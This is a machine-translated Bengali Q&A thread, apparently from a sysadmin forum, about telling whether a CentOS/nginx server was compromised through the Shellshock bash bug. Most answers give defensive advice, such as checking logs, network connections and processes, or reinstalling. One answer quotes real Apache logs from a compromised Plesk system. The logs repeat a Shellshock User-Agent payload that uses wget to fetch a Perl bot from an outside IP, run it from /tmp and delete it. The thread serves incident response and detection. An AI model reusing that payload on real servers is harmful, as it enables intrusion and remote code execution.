শেলশক: আমার সার্ভারে + সন্দেহজনক ফাইলগুলি সন্ধানের জন্য আপোস করা হয়েছে কিনা তা আমি কীভাবে জানব

18

তিনটি প্রশ্নের উত্তর যা আমি আশা করি যে কেউ উত্তর দিতে পারে:

  1. শেলশক বাগের কারণে আমার সার্ভারটি ইতিমধ্যে আপস করা হয়েছে কিনা তা আমি কীভাবে জানব?
  2. যদি এটি আপোস করা হয়, তবে এমন কোনও নির্দিষ্ট ফোল্ডার যেখানে আমার দূষিত ফাইলগুলি সন্ধান করা উচিত?
  3. দূষিত ফাইলটি কেমন দেখাচ্ছে?

আমি সেন্টস 6, এলইএমপি স্ট্যাক চালাচ্ছি

centos  nginx 
মধু ব্যাজার
সূত্র

উত্তর:

36

শেলশক বাগের কারণে আমার সার্ভারটি ইতিমধ্যে আপস করা হয়েছে কিনা তা আমি কীভাবে জানব?

আপনি না। এটি একটি সুরক্ষার দুর্বলতার ধারণা। আপনি যদি ক্র্যাকার প্রবেশ করতে ক্লিক করতে হয়? ঠিক আছে / বাতিল করুন এটি খুব একটা দুর্বলতার বিষয় নয়।

আপনার আক্রমণভাগের ভেক্টরগুলির লগগুলি পরীক্ষা করার জন্য আপনার ভাগ্য ভাগ্যক্রমে থাকতে পারে তবে অনেক পরিষেবা দুর্বল হয়ে পড়ে এবং সেগুলির মধ্যে প্রতিটি অ্যাক্সেস লগ করে না, সম্ভবত কোনও আক্রমণ খুঁজে পাওয়া সম্ভব হয় না not

যদি এটি আপোস করা হয়, তবে এমন কোনও নির্দিষ্ট ফোল্ডার যেখানে আমার দূষিত ফাইলগুলি সন্ধান করা উচিত?

না, একটি দূষিত ফাইল যে কোনও জায়গায় থাকতে পারে।

প্রচলিত rootkits নিজেদের মধ্যে ইনস্টল /rootবা /বা /tmpবা বাইনারি পাথ এক কিন্তু সত্যিই তারা যে কোনও জায়গা হতে পারে। তাদের সত্যিকারের পরিষেবার মতো কিছু "গুরুত্বপূর্ণ" দেখতে " IPTables" বা " kernel-bin" এর মতো একটি নাম থাকতে পারে তবে এগুলি অক্ষরগুলির এলোমেলো স্ট্রিং বা জেনুইন বাইনারি হিসাবে একই নাম হতে পারে (কেবল একটি পৃথক পথে)। আপনি সত্যিই সুস্পষ্ট রুটকিট লোড করে /etc/rc.localবা এর মাধ্যমে সংযোগ তৈরি করতে পারেন netstat -neopa। এতে সন্দেহজনক প্রক্রিয়া নাম অনুসন্ধান করুন top -c

রুটকিটটি খুঁজে পাওয়া একটি কম সাধারণ এবং আরও অনেক কঠিন একটি লাইব্রেরি প্রতিস্থাপন করে বা শিম লাইব্রেরি হিসাবে নিজেকে লোড করে এবং সিস্টেম কলগুলি আটকায়। আপনার সিস্টেমে চলমান প্রতিটি জিনিসকে আপনি স্ট্রেস / এলট্রেস না করে এবং পরিচিত-ভাল সিস্টেম বা উত্স কোডের প্রত্যাশিত আচরণের সাথে আচরণের তুলনা না করে এটি সন্ধান করা প্রায় অসম্ভব।

কেবলমাত্র সিস্টেমটি পুনরায় লোড করা এটি দ্রুত, সহজ এবং আরও চূড়ান্ত হবে।

দূষিত ফাইলটি কেমন দেখাচ্ছে?

সম্ভবত অন্য কোনও নিয়মিত ইএলএফ বাইনারি বা লাইব্রেরির মতো। এটি স্ক্রিপ্টও হতে পারে।

উপসংহারে, আপনি যদি মনে করেন যে আপনার সিস্টেমের সাথে আপোস হওয়ার সম্ভাবনা রয়েছে, তবে সিস্টেমটিকে আপোস করা হয়েছে এমনভাবে আচরণ করুন এবং প্রয়োজনীয় ব্যবস্থা নিন।

suprjami
সূত্র
14
+1 "ক্র্যাকারদের প্রবেশ করতে দিন?" অন্য একটি নোটে ... আপনি যদি লিনাক্সে "আইপিটিবেলস" নামের কিছু দেখতে পান তবে খুব সন্দেহজনক হন। ইউনিক্সিয়ান ক্যাপসফোবিক।
বিশপ
যদি আপনি মনে করেন যে আপনার সিস্টেমের সাথে আপোস হয়েছে এমন কোনও সম্ভাবনা রয়েছে তবে সিস্টেমটিকে আপোস করা হয়েছে এমনভাবে আচরণ করুন এবং প্রয়োজনীয় ব্যবস্থা নিন। এর অর্থ হ'ল প্রতিটি সম্ভাব্য সিস্টেম যা bashইনস্টল করা আছে এবং একটি নেটওয়ার্ক কেবল তার সাথে সংযুক্ত আছে, তাই না?
ফেডেরিকো পোলোনি
@ ফেডেরিকো পোলোনি কেবলমাত্র যদি কেউ নেটওয়ার্কের মাধ্যমে আপনার শেল অ্যাক্সেস করতে সক্ষম হয়। তবে অন্যথায় আপনি একদম ঠিক বলেছেন।
স্কাই
@ ফেডেরিকো পোলোনি আমি নিশ্চিত নই যে এটি বুদ্ধিমান পছন্দ কিনা, কারণ আমাকে নিয়মিতভাবে সমস্ত সিস্টেম বন্ধ করে দিতে হবে, যেহেতু আমি কখনই তাদের সাথে সমঝোতা করা হয়নি এমন 100% নিশ্চিত হতে পারি না, এবং গুরুত্ব সহকারে কেউ নিশ্চিত হতে পারবেন না যে যদি না তাদের সিস্টেমগুলি আপস না করা হয় তারা একটি খুব আশাবাদী আইডি * টি। যদি আপনার সন্দেহজনক হয় যে আপনার সিস্টেমটি যেমন করা উচিত তেমন আচরণ করে না, তবে আপনি এটি এবং এর নেটওয়ার্ক ট্র্যাফিকটি পরীক্ষা করা উচিত, সাধারণত একটি ক্লিন ওএস থেকে। গর্ত ঠিক করার পাশে আপনাকে কোনও পদক্ষেপ নেওয়ার দরকার নেই বলে আমি প্রমাণ পাই। অন্যথায় আমাদের নিয়মিত সমস্ত সিস্টেম 24x7 পুনরায় ইনস্টল করতে হবে!
ফ্র্যাঙ্ক ওয়ালার 10
@ ফ্র্যাঙ্কওয়ালার আমি সম্পূর্ণরূপে একমত নেই সবসময় একটি দূরবর্তী সম্ভাবনা যে একটি সিস্টেম আপোস করা হয়েছে এবং আক্রমণকারী দক্ষ যথেষ্ট কোন অস্তিত্ব ছেড়ে না, কিন্তু আমরা এই ক্ষেত্রে পূরণ করার 24X7 পুনরায় ইনস্টল করতে পারবেন না।
ফেডেরিকো পোলোনি
21

শেলশক কোনও কৃমি নয় তাই দেখার জন্য কোনও ফাইল নেই। শেলশক হ'ল প্রবেশাধিকার পাওয়ার জন্য কোনও নেটওয়ার্ক আক্রমণ করার একটি উপায়। একবার ভিতরে ভিতরে কে জানে যে আক্রমণকারী কী করবে।

মাইক
সূত্র
3
এই উত্তরটি আমার কাছে কিছুটা বিভ্রান্ত বলে মনে হচ্ছে - তাড়াহুড়ো করে এটি ড্যাশ হয়ে গেছে, বা উত্তরের পরিবর্তে একটি মন্তব্য হওয়া উচিত। অবশ্যই, এটি কোনও কৃমি নয় (এটি একটি দুর্বলতা, ম্যালওয়ারের টুকরো নয়) তবে আপনি কেন এটি প্রাসঙ্গিক বলে মনে করেন বা এটি কেন "অনুসন্ধানের জন্য কোনও ফাইল নেই" তা পরিষ্কার নয়। শেলশক কোনও নেটওয়ার্ক আক্রমণ করার উপায় নয়; এটি একটি মেশিনে প্রবেশের উপায়। এটি কোনও নেটওয়ার্কে নয়, একটি মেশিনে আক্রমণ।
DW
2
@ ডিডাব্লু খুব মেলামেশা মঞ্জুর করেছে, তবে স্পষ্টতই ওপির উদ্বেগের প্রত্যক্ষ প্রতিক্রিয়াতে is there a particular folder where I should look for malicious files
ᴠɪɴᴄᴇɴᴛ
5

আমি বাগটি শোষণের জন্য একটি প্রচেষ্টা দেখেছি, যা আইআরসি বট হিসাবে ইনস্টল করতে পারে /var/tmp/x। তবে সাধারণভাবে সন্ধানের জন্য কোনও নির্দিষ্ট ফাইল নেই কারণ সেগুলি কোথাও বা কোথাও থাকতে পারে।

আপনি যদি ওয়েব সার্ভারের মাধ্যমে আপস করেন তবে ওয়েব সার্ভার ব্যবহারকারীর মালিকানাধীন কোনও নতুন ফাইল বা প্রক্রিয়া সন্দেহজনক হবে।

যদি কোনও আক্রমণকারী bashসিস্টেমে প্রবেশের জন্য বাগটি প্রথমে ব্যবহার করে এবং তার পরে স্থানীয় একটি দুর্বলতা হয়ে ওঠে root, তবে এটি চিহ্নিত করা প্রায় অসম্ভব হয়ে উঠতে পারে।

এই একই প্রশ্ন দেখুন

kasperd
সূত্র
ওয়েব সার্ভার ব্যবহারকারীর মালিকানা ধারণার জন্য +1
Xan
4

আমি সুপ্রজামির উত্তরটি প্রতিধ্বনিত করে বলব যে যদি আপনার সিস্টেমটি দুর্বল হয় তবে আপনার এটিকে আপোস হিসাবে গণ্য করা উচিত।

যদি আপনি অ্যাপাচি চালিয়ে যাচ্ছেন তবে নীচের কমান্ডের সাহায্যে শেলশক অনুপ্রবেশের প্রচেষ্টাগুলির জন্য লগগুলি পরীক্ষা করতে পারেন:

[root@server ~]# grep cgi /var/log/httpd/access*|egrep "};|}\s*;"

এই কমান্ডটি আপাচের অ্যাক্সেস লগগুলি (ডিফল্টরূপে অ্যাক্সেস_লগ, অ্যাক্সেস_লগ .১, অ্যাক্সেস_লগ ২ ইত্যাদি বলা হয়) থেকে "সিজি" সমেত সমস্ত লাইন নিষ্কাশন করে তারপরে এটি রেগেক্সের সাথে এড্রেপে পাইপ দেয়।

(সূত্র: http://linux.slashdot.org/story/14/09/24/1638207/remote-exploit-vulnerability-found-in-bash )

রালফ
সূত্র
নোট করুন যে অ্যাপাচি-এর ডিফল্ট কনফিগারেশনের জন্য, এটি কেবল গন্তব্য URL এবং "ব্যবহারকারী-এজেন্ট" এবং "রেফারার" শিরোনামগুলিতে আক্রমণগুলি দেখায়। "কুকি" বা "এক্স-প্লাইট" এর মতো শিরোনামে আক্রমণ করা হবে না।
চিহ্নিত করুন
1
@ মার্ক অবশ্যই, আমার এটি উল্লেখ করা উচিত ছিল।
রাল্ফ
1
অবশ্যই, কোনও স্ব-সম্মানজনক আক্রমণকারী প্রথমে যে কাজটি করবে তা হ'ল লগগুলি থেকে আক্রমণটির কোনও ইঙ্গিত মুছে ফেলা হয় ... এজন্য লগগুলি একবারে লিখতে হবে এবং দূরবর্তী হতে হবে!
জার্গ ডব্লু মিট্টাগ
4

যেহেতু শেলশকের জন্য বেশ কয়েকটি আক্রমণকারী ভেক্টর রয়েছে, তাদের মধ্যে কিছু এখনও সাধারণ জনগণের জন্য অজানা বা কাস্টম সিজিআই স্ক্রিপ্টের কারণে ঘটেছে, আপনার আপস করা হয়েছে কি না তা বলার কোনও নির্দিষ্ট উপায় নেই।

সাধারণ "এছাড়াও কিছু সিস্টেম ফাইলগুলি পরিবর্তিত হয়েছে বা ইদানীং সন্দেহজনক কিছু ঘটেছে কিনা তা দেখুন" এর পাশাপাশি আপনি নিজের সার্ভারের আচরণের দিকে নজর রাখতে চান এমন পদ্ধতির।

  1. হঠাৎ কি আরও অনেক বেশি নেটওয়ার্ক ট্র্যাফিক রয়েছে?
  2. সিপিইউ / মেমরির ব্যবহার কি অনেক পরিবর্তন হয়েছিল?
  3. কিছু কি ডিস্কের জায়গা খেয়ে চলেছে বা সাধারণত I / O এর চেয়ে অনেক বেশি ঘটায়?
  4. নেই netstatঅদ্ভুত নেটওয়ার্ক সংযোগ বা প্রদর্শন ps auxপ্রদর্শনী প্রসেস আপনাকে চিনতে না?
  5. আপনার সার্ভার হঠাৎ আগের চেয়ে অনেক বেশি ইমেল প্রেরণ করে?

আপনার যদি সঠিক সার্ভারের স্বাস্থ্য পর্যবেক্ষণ (যেমন Zabbix) চালিয়ে যায় তবে এটি আপনাকে সুরক্ষা লঙ্ঘন সন্ধান করতেও সহায়তা করতে পারে। আপনি একটি ভাল ভাল ব্যাকআপের সাথে সিস্টেম ফাইলের MD5 / SHA সংখ্যার তুলনা করতে পারেন।

কেবলমাত্র আপনার সার্ভারের সাথে আপোস করা হয়েছিল এবং আপনি যা ভাবতে পারেন তার সব তদন্ত করুন Just

জানে পিক্করাইনে
সূত্র
4

আমি ঠিক একটি আপোষযুক্ত পুরানো প্লেস্ক সিস্টেম পরিষ্কার করার আনন্দ পেয়েছি। প্রথমটি যা এটিকে দিয়েছে তা হ'ল অসংখ্য প্রক্রিয়া যা বেশিরভাগ বন্দর এবং অন্যরা আসল স্ক্যানিং সার্ভার থেকে কোড ডাউনলোড করার চেষ্টা করতে শুরু করে।

    lsof -i -n
...
        perl       1899      user100     3u  IPv4 227582583      0t0  TCP 87.106.215.123:49859->94.102.63.238:https (SYN_SENT)
        perl       1999      user101     3u  IPv4 227582597      0t0  TCP 87.106.215.123:49861->94.102.63.238:https (SYN_SENT)
        perl       2016       wwwrun     3u  IPv4 227549964      0t0  TCP 87.106.215.123:56263->94.102.63.238:https (ESTABLISHED)
...

লগগুলি অনুসরণ করে আমি জানতে পারলাম চূড়ান্ত ছিদ্রটি হ'ল একটি cgi_wrapperস্ক্রিপ্ট, এমন কিছু যা সিস্টেমটিকে সুরক্ষিত এবং রক্ষার কথা ছিল যা আসলে গর্তটি সুরক্ষায় ছিঁড়ে দেয়। এখানে প্রোব এবং সফল আক্রমণ থেকে কিছু লগ লাইন দেওয়া হয়েছে:

এগুলি অ্যাক্সেস_লগের লাইনগুলি, কারণ এটি কেবলমাত্র একটি নমুনা, দুটি লাইনের 200 টি নোট করুন এবং অন্যগুলি 404 দিয়ে ব্যর্থ হয় You 404 রয়েছে এমন লাইনগুলি নিয়ে আপনার কোনও চিন্তা করার দরকার নেই যেহেতু এগুলি সফল হয় নি, 200 সঙ্গে বেশী যাইহোক। এখানে এই আক্রমণগুলির প্যাটার্নটি সর্বদা একরকম: 1. একটি পারল স্ক্রিপ্ট ডাউনলোড এবং সম্পাদন করতে একটি দুর্বল সিজি স্ক্রিপ্ট শেলশক ব্যবহার করুন, পার্ল স্ক্রিপ্টটি আবার মুছুন। পার্ল স্ক্রিপ্টটি আসলে কিছু উত্স ফাইল ডাউনলোড করবে (tgz) সেগুলি সংকলন করে এবং সেগুলি চালাবে, যা আমি দেখেছি সেগুলি থেকে অন্তত একটি ব্যাকডোর এবং একটি স্বয়ংক্রিয় আপডেট প্রক্রিয়া অন্তর্ভুক্ত রয়েছে, আরও উন্নত সম্পাদনের সুযোগগুলি অর্জন করার চেষ্টা এবং অর্জনের জন্য কী দেখায়। প্রাথমিক স্ক্রিপ্টগুলির সমস্তগুলি প্রকৃতপক্ষে মোড়ক সরবরাহকারী ব্যবহারকারী হিসাবে কার্যকর করা হয় যখন পরে পরিষেবাগুলি 1 এর পিপিআইডি দিয়ে শুরু করা হয় (রুট প্রক্রিয়া থেকে শুরু হয়েছিল)।

94.102.63.238 - - [28/Sep/2014:00:41:03 +0200] "GET /cgi-sys/php5? HTTP/1.1" 404 1018 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
94.102.63.238 - - [28/Sep/2014:00:41:03 +0200] "GET /phppath/php? HTTP/1.1" 404 1018 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
94.102.63.238 - - [28/Sep/2014:00:41:03 +0200] "GET /cgi-bin/php? HTTP/1.1" 404 1018 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
94.102.63.238 - - [28/Sep/2014:00:41:03 +0200] "GET /cgi-bin/php5? HTTP/1.1" 404 1018 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
94.102.63.238 - - [28/Sep/2014:00:41:03 +0200] "GET /cgi-bin/php5-cli? HTTP/1.1" 404 1018 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
94.102.63.238 - - [28/Sep/2014:00:41:03 +0200] "GET /phppath/cgi_wrapper? HTTP/1.1" 200 9 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
94.102.63.238 - - [28/Sep/2014:01:29:34 +0200] "GET /cgi-sys/php5? HTTP/1.1" 404 1018 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
94.102.63.238 - - [28/Sep/2014:01:29:34 +0200] "GET /phppath/php? HTTP/1.1" 404 1018 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
94.102.63.238 - - [28/Sep/2014:01:29:34 +0200] "GET /cgi-bin/php? HTTP/1.1" 404 1018 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
94.102.63.238 - - [28/Sep/2014:01:29:34 +0200] "GET /cgi-bin/php5? HTTP/1.1" 404 1018 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
94.102.63.238 - - [28/Sep/2014:01:29:34 +0200] "GET /cgi-bin/php5-cli? HTTP/1.1" 404 1018 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"
94.102.63.238 - - [28/Sep/2014:01:29:34 +0200] "GET /phppath/cgi_wrapper? HTTP/1.1" 200 9 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://94.102.63.238/shell.pl -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\");'"

এবং এখানে সম্পর্কিত ত্রুটি_লগ লাইনগুলি:

[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] File does not exist: /srv/www/vhosts/default/htdocs/cgi-sys
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] script not found or unable to stat: /srv/www/cgi-bin/cgi_wrapper/php
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] --2014-09-28 00:41:03--  http://94.102.63.238/shell.pl
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] Connecting to 94.102.63.238:80...
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] connected.
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] HTTP request sent, awaiting response...
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] script not found or unable to stat: /srv/www/vhosts/default/cgi-binphp
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] 200 OK
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] Length:
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] 17079
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]  (17K)
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]  [text/x-perl]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] Saving to: `/tmp/bot.pl'
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]      0K
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] 100%
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]   626K
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] =0.03s
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] 2014-09-28 00:41:03 (626 KB/s) - `/tmp/bot.pl' saved [17079/17079]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238]
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] script not found or unable to stat: /srv/www/vhosts/default/cgi-binphp5
[Sun Sep 28 00:41:03 2014] [error] [client 94.102.63.238] script not found or unable to stat: /srv/www/vhosts/default/cgi-binphp5-cli
[Sun Sep 28 00:46:03 2014] [warn] [client 94.102.63.238] Timeout waiting for output from CGI script /srv/www/cgi-bin/cgi_wrapper/cgi_wrapper
[Sun Sep 28 00:46:03 2014] [error] [client 94.102.63.238] (70007)The timeout specified has expired: ap_content_length_filter: apr_bucket_read() failed
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] File does not exist: /srv/www/vhosts/default/htdocs/cgi-sys
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] script not found or unable to stat: /srv/www/cgi-bin/cgi_wrapper/php
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] --2014-09-28 01:29:34--  http://94.102.63.238/shell.pl
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] Connecting to 94.102.63.238:80...
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] connected.
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] HTTP request sent, awaiting response...
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] script not found or unable to stat: /srv/www/vhosts/default/cgi-binphp
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] 200 OK
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] Length:
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] 17079
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]  (17K)
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]  [text/x-perl]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] Saving to: `/tmp/bot.pl'
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]      0K
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238] .
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
[Sun Sep 28 01:29:34 2014] [error] [client 94.102.63.238]
